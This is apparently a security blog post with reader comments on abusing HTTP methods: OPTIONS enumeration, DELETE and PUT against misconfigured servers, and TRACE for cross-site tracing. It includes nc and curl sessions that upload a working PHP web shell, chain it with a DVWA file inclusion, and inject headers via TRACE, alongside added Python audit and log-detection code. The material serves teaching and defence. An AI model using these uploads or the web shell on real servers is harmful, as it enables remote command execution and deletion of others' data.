The HTTP protocol comprises the following verbs or methods.
- GET
- HEAD
- POST
- PUT
- DELETE
- CONNECT
- OPTIONS
- TRACE
I assume you are already familiar with these; you can read about them in detail in the RFC documents listed under References.
I will show some interesting HTTP verbs which can be used to break into servers. These attacks are rare in practice, but I thought they were worth sharing 🙂
OPTIONS
If the OPTIONS verb is enabled on the server, it can be used to list all the HTTP methods the server has configured.
% nc localhost 80
OPTIONS / HTTP/1.0

HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.5
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Sun, 14 Jun 2015 05:31:10 GMT
Connection: close
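The same check can be automated when auditing your own servers. The Python below is an added example, not part of the original post: it builds the raw OPTIONS request typed into nc above, parses a reply constructed to match the IIS response, and reports which advertised methods deserve a closer look. The method list `RISKY_METHODS` is my own choice.

```python
# Added example (not from the original post): audit the methods a server
# advertises in its OPTIONS reply and flag the ones worth reviewing.

# Methods that warrant a closer look when a server advertises them (assumption).
RISKY_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT"}

# Constructed to mirror the IIS 7.5 reply quoted in the post.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Date: Sun, 14 Jun 2015 05:31:10 GMT\r\n"
    "Connection: close\r\n\r\n"
)


def build_options_request(host, path="/"):
    """The raw bytes the nc session types by hand (Host header added for vhosts)."""
    return f"OPTIONS {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def parse_response_head(raw):
    """Return (status_code, {lower-cased header name: value}) for a raw response."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def advertised_methods(raw):
    """Union of the Allow and Public lists (IIS sends both, Apache only Allow)."""
    _, headers = parse_response_head(raw)
    methods = set()
    for name in ("allow", "public"):
        for m in headers.get(name, "").split(","):
            if m.strip():
                methods.add(m.strip().upper())
    return methods


def audit(raw):
    """Risky methods the server claims to accept, sorted. Allow is advisory:
    a method absent from it may still be honoured and a listed one may be
    refused further down the stack, so confirm the result on your own server."""
    return sorted(advertised_methods(raw) & RISKY_METHODS)
```

Running `audit(SAMPLE_RESPONSE)` on the constructed reply returns `["TRACE"]`, the one method the IIS server above advertises that should normally be disabled.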
DELETE
The DELETE verb is dangerous and can be misused. If it is misconfigured, it can be used to delete resources from the web server.
% nc localhost 80
DELETE /location/resource HTTP/1.0

Date: Sun, 14 Jun 2015 05:01:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=ete39c4b0uk83phvucj1ftbsn5; expires=Mon, 15 Jun 2015 05:01:22 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
PUT
This verb can be used to upload a resource to the server. It is also risky if not configured appropriately. For example, suppose we want to write "<?php echo 'Hello World'; ?>" into a new file named "hello.php". Make sure you give the correct length of your payload in the Content-Length header.
% cat -e hello.php
<?php echo 'Hello World'; ?>$
% wc -m hello.php
29 hello.php
% nc localhost 80
PUT /hello.php HTTP/1.0
Content-Type: text/html
Content-Length: 29

<?php echo 'Hello World'; ?>
PUT verb in PHP
PHP supports the PUT verb. This sample program receives the body of a PUT request and saves it as "myfile".
<?php
// Open the raw request body (the PUT payload) for reading.
$putdata = fopen("php://input", "r");
// Open "myfile" next to this script for writing, truncating any previous content.
$fp = fopen("myfile", "w");
// Copy the body across in 1024-byte chunks until end of input.
while ($data = fread($putdata, 1024))
    fwrite($fp, $data);
fclose($fp);
fclose($putdata);
?>
I will save this as "put.php" in the document root of my web server.
Now we can request "put.php" using the PUT verb and send our payload.
% cat -e phpinfo.php
<?php phpinfo(); ?>$
% wc -m phpinfo.php
20 phpinfo.php
% nc 192.168.1.5 80
PUT /put.php HTTP/1.0
Content-Type: text/html
Content-Length: 20

<?php phpinfo(); ?>
HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 06:48:16 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
Content-Length: 0
Connection: close
Content-Type: text/html
Now if you view "myfile", our payload should have been written to it.
Suppose you have a local file inclusion vulnerability; in a case like that, we can include the file we just wrote using PUT.
This is an example of local file inclusion. I’ll be using DVWA to demonstrate this.
<?php
echo "File included: ".$_REQUEST["page"]."<br>";
$file = $_REQUEST["page"];
include $file;
?>
http://localhost/dvwa/vulnerabilities/fi/?page=../../../myfile
Suppose we want to upload a simple web shell; we can do it like the following 😉
% wc -m shell.php
189 shell.php
% nc 192.168.1.5 80
PUT /put.php HTTP/1.0
Content-Type: text/html
Content-Length: 189

<?php
print '<form method="post">
Command: <input type="text" name="__"><br>
<input type="submit">
</form>';
if(isset($_POST["__"])) print '<pre>'.shell_exec($_POST["__"]).'</pre>';
?>
HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 07:39:42 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
Content-Length: 0
Connection: close
Content-Type: text/html
After that, include our "myfile" and you can execute commands on the server.
You can also use curl to upload a file using PUT easily.
% curl http://192.168.1.5/put.php --upload-file shell.php -v
* About to connect() to 192.168.1.5 port 80 (#0)
*   Trying 192.168.1.5...
* connected
* Connected to 192.168.1.5 (192.168.1.5) port 80 (#0)
> PUT /put.php HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 192.168.1.5
> Accept: */*
> Content-Length: 189
> Expect: 100-continue
>
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 100 Continue
* additional stuff not fine transfer.c:1037: 0 0
* We are completely uploaded and fine
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 200 OK
< Date: Mon, 15 Jun 2015 07:47:44 GMT
< Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
< X-Powered-By: PHP/5.4.22
< Content-Length: 0
< Content-Type: text/html
<
* Connection #0 to host 192.168.1.5 left intact
* Closing connection #0
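Every request in the PUT and DELETE sessions above leaves a line in the web server's access log, which is where a defender would spot this activity. The Python below is an added example, not part of the original post: it parses constructed Apache combined-format lines that mirror those sessions, lists the risky verbs the server actually honoured (2xx), and flags a client that uploaded with PUT and then sent the `../` path used in the DVWA include. The log lines and IP addresses are made up.

```python
# Added example (not from the original post): detection over access-log lines.
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines. The PUT, DELETE and TRACE entries
# mirror the sessions in the post; the encoded GET is the DVWA include.
SAMPLE_LOG = """\
192.168.1.9 - - [15/Jun/2015:06:48:16 +0000] "PUT /put.php HTTP/1.0" 200 0 "-" "-"
192.168.1.9 - - [15/Jun/2015:06:49:02 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2F..%2Fmyfile HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [15/Jun/2015:06:50:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.9 - - [14/Jun/2015:05:01:22 +0000] "DELETE /location/resource HTTP/1.0" 200 0 "-" "-"
192.168.1.9 - - [17/Jun/2015:07:58:18 +0000] "TRACE / HTTP/1.1" 200 121 "-" "curl/7.26.0"
10.0.0.7 - - [15/Jun/2015:07:47:44 +0000] "PUT /put.php HTTP/1.1" 405 298 "-" "curl/7.26.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)
WATCHED = {"PUT", "DELETE", "TRACE"}  # verbs covered in the post


def parse_line(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def honoured_risky_requests(log_text):
    """(ip, method, path, status) for every watched verb answered with 2xx.
    A 405 means the server refused the method, so it is left out."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] in WATCHED and rec["status"].startswith("2"):
            hits.append((rec["ip"], rec["method"], rec["path"], int(rec["status"])))
    return hits


def put_then_traversal(log_text):
    """Clients that uploaded with PUT (2xx) and later requested a path that
    contains '../' once URL-decoded: the PUT + file-inclusion chain above."""
    uploaded, suspects = set(), set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        if rec["method"] == "PUT" and rec["status"].startswith("2"):
            uploaded.add(rec["ip"])
        elif rec["ip"] in uploaded and "../" in unquote(rec["path"]):
            suspects.add(rec["ip"])
    return sorted(suspects)
```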
Thanks for reading!
References
[1] http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
[2] https://tools.ietf.org/html/rfc7231
Wow, awesome bro. It is a new thing to learn 😀 Thanks for writing 🙂
Wow :O really nice (y) Thanks for sharing
Thanks for the feedback!
Nice share, you explained how to exploit PUT & DELETE, so what about the TRACE method?
In the TRACE method you can inject your own header, for example:
root@kali:~/temp# curl -v -X TRACE -H "X-Header: Osanda" Host.com
* About to connect() to Host.com port 80 (#0)
* Trying 1.1.1.1...
* connected
* Connected to Host.com (1.1.1.1) port 80 (#0)
> TRACE / HTTP/1.1
> User-Agent: curl/7.26.0
> Host: Host.com
> Accept: */*
> X-Header: Osanda
>
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 200 OK
< Date: Wed, 17 Jun 2015 07:58:18 GMT
< Server: Apache/2.2.3 (CentOS)
< Connection: close
< Transfer-Encoding: chunked
< Content-Type: message/http
<
TRACE / HTTP/1.1
User-Agent: curl/7.26.0
Host: Host.com
Accept: */*
X-Header: Osanda
This can lead to the stealing of cookies even if the HttpOnly flag is set.
More information on XST attacks:
https://www.owasp.org/index.php/Cross_Site_Tracing